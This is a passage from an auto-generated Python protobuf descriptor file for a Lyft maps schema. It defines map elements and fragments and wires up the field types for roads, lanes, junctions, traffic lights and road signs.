name='Element',
full_name='pb.lyft.maps.MapElement.Element',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='segment', full_name='pb.lyft.maps.MapElement.Element.segment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='node', full_name='pb.lyft.maps.MapElement.Element.node', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lane', full_name='pb.lyft.maps.MapElement.Element.lane', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_control_element', full_name='pb.lyft.maps.MapElement.Element.traffic_control_element', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='junction', full_name='pb.lyft.maps.MapElement.Element.junction', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='segment_sequence', full_name='pb.lyft.maps.MapElement.Element.segment_sequence', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='annotated_shape', full_name='pb.lyft.maps.MapElement.Element.annotated_shape', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='element', full_name='pb.lyft.maps.MapElement.Element.element',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=12196,
serialized_end=12584,
)
_MAPELEMENT_ASSOCIATEDCONDITIONS = _descriptor.Descriptor(
name='AssociatedConditions',
full_name='pb.lyft.maps.MapElement.AssociatedConditions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='conditions', full_name='pb.lyft.maps.MapElement.AssociatedConditions.conditions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='overrides', full_name='pb.lyft.maps.MapElement.AssociatedConditions.overrides', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12586,
serialized_end=12706,
)
_MAPELEMENT_DEBUGINFOENTRY = _descriptor.Descriptor(
name='DebugInfoEntry',
full_name='pb.lyft.maps.MapElement.DebugInfoEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='pb.lyft.maps.MapElement.DebugInfoEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='pb.lyft.maps.MapElement.DebugInfoEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12708,
serialized_end=12756,
)
_MAPELEMENT = _descriptor.Descriptor(
name='MapElement',
full_name='pb.lyft.maps.MapElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pb.lyft.maps.MapElement.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='element', full_name='pb.lyft.maps.MapElement.element', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bounding_box', full_name='pb.lyft.maps.MapElement.bounding_box', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='associated_conditions', full_name='pb.lyft.maps.MapElement.associated_conditions', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='debug_info', full_name='pb.lyft.maps.MapElement.debug_info', index=4,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='service_region', full_name='pb.lyft.maps.MapElement.service_region', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_MAPELEMENT_ELEMENT, _MAPELEMENT_ASSOCIATEDCONDITIONS, _MAPELEMENT_DEBUGINFOENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11884,
serialized_end=12756,
)
_MAPFRAGMENT = _descriptor.Descriptor(
name='MapFragment',
full_name='pb.lyft.maps.MapFragment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.MapFragment.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='elements', full_name='pb.lyft.maps.MapFragment.elements', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12758,
serialized_end=12829,
)
_GEOLOCATION.oneofs_by_name['Altitude'].fields.append(
_GEOLOCATION.fields_by_name['altitude_cm'])
_GEOLOCATION.fields_by_name['altitude_cm'].containing_oneof = _GEOLOCATION.oneofs_by_name['Altitude']
_GEOFRAME.fields_by_name['origin'].message_type = _GEOLOCATION
_ROADNETWORKNODE.fields_by_name['location'].message_type = _GEOLOCATION
_ROADNETWORKNODE.fields_by_name['road_segments'].message_type = _GLOBALID
_ROADNETWORKNODE.fields_by_name['junction'].message_type = _GLOBALID
_ACCESSRESTRICTION.fields_by_name['type'].enum_type = _ACCESSRESTRICTION_TYPE
_ACCESSRESTRICTION_TYPE.containing_type = _ACCESSRESTRICTION
_DAILYTIMEINTERVAL.fields_by_name['day_of_the_week'].enum_type = _DAILYTIMEINTERVAL_DAYOFTHEWEEK
_DAILYTIMEINTERVAL_DAYOFTHEWEEK.containing_type = _DAILYTIMEINTERVAL
_SCHEDULE.fields_by_name['daily_schedule'].message_type = _DAILYTIMEINTERVAL
_CONDITION.fields_by_name['daily_temporal_condition'].message_type = _DAILYTIMEINTERVAL
_CONDITION.oneofs_by_name['condition'].fields.append(
_CONDITION.fields_by_name['daily_temporal_condition'])
_CONDITION.fields_by_name['daily_temporal_condition'].containing_oneof = _CONDITION.oneofs_by_name['condition']
_ROADNETWORKSEGMENT_LANESET.fields_by_name['bike_lane_access'].enum_type = _ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS
_ROADNETWORKSEGMENT_LANESET.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS.containing_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['vertices'].message_type = _GEOLOCATION
_ROADNETWORKSEGMENT.fields_by_name['start_node'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['end_node'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['forward_lane_set'].message_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['backward_lane_set'].message_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['lanes'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['name'].message_type = _LOCALIZEDSTRING
_ROADNETWORKSEGMENT.fields_by_name['road_class'].enum_type = _ROADNETWORKSEGMENT_ROADCLASS
_ROADNETWORKSEGMENT.fields_by_name['travel_direction'].enum_type = _ROADNETWORKSEGMENT_TRAVELDIRECTION
_ROADNETWORKSEGMENT.fields_by_name['restrictions'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['walkable'].enum_type = _ROADNETWORKSEGMENT_SIDEOFSEGMENT
_ROADNETWORKSEGMENT.fields_by_name['forward_bikeable'].enum_type = _ROADNETWORKSEGMENT_BIKEACCESS
_ROADNETWORKSEGMENT.fields_by_name['backward_bikeable'].enum_type = _ROADNETWORKSEGMENT_BIKEACCESS
_ROADNETWORKSEGMENT_ROADCLASS.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_TRAVELDIRECTION.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_SIDEOFSEGMENT.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_BIKEACCESS.containing_type = _ROADNETWORKSEGMENT
_JUNCTION.fields_by_name['road_network_nodes'].message_type = _GLOBALID
_JUNCTION.fields_by_name['lanes'].message_type = _GLOBALID
_JUNCTION.fields_by_name['traffic_control_elements'].message_type = _GLOBALID
_LANE_BOUNDARY.fields_by_name['divider_type'].enum_type = _LANE_BOUNDARY_DIVIDERTYPE
_LANE_BOUNDARY.containing_type = _LANE
_LANE_BOUNDARY_DIVIDERTYPE.containing_type = _LANE_BOUNDARY
_LANE.fields_by_name['parent_segment_or_junction'].message_type = _GLOBALID
_LANE.fields_by_name['access_restriction'].message_type = _ACCESSRESTRICTION
_LANE.fields_by_name['orientation_in_parent_segment'].enum_type = _ROADNETWORKSEGMENT_TRAVELDIRECTION
_LANE.fields_by_name['turn_type_in_parent_junction'].enum_type = _LANE_TURNTYPE
_LANE.fields_by_name['geo_frame'].message_type = _GEOFRAME
_LANE.fields_by_name['left_boundary'].message_type = _LANE_BOUNDARY
_LANE.fields_by_name['right_boundary'].message_type = _LANE_BOUNDARY
_LANE.fields_by_name['lanes_ahead'].message_type = _GLOBALID
_LANE.fields_by_name['adjacent_lane_change_left'].message_type = _GLOBALID
_LANE.fields_by_name['adjacent_lane_change_right'].message_type = _GLOBALID
_LANE.fields_by_name['traffic_controls'].message_type = _GLOBALID
_LANE.fields_by_name['yield_to_lanes'].message_type = _GLOBALID
_LANE.fields_by_name['tolls'].message_type = _GLOBALID
_LANE_TURNTYPE.containing_type = _LANE
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.fields_by_name['traffic_lights'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.fields_by_name['yield_lines'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT.fields_by_name['primary_traffic_control_elements'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['lane'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['yield_to_lanes'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['yield_to_crosswalks'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.containing_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE.fields_by_name['yield_rules_when_on'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT.fields_by_name['face_states'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'].message_type = _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHT
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'].message_type = _TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['geo_frame'].message_type = _GEOFRAME
_TRAFFICCONTROLELEMENT.fields_by_name['geometry_type'].enum_type = _TRAFFICCONTROLELEMENT_GEOMETRYTYPE
_TRAFFICCONTROLELEMENT.fields_by_name['controlled_paths'].message_type = _LANESEQUENCE
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'])
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
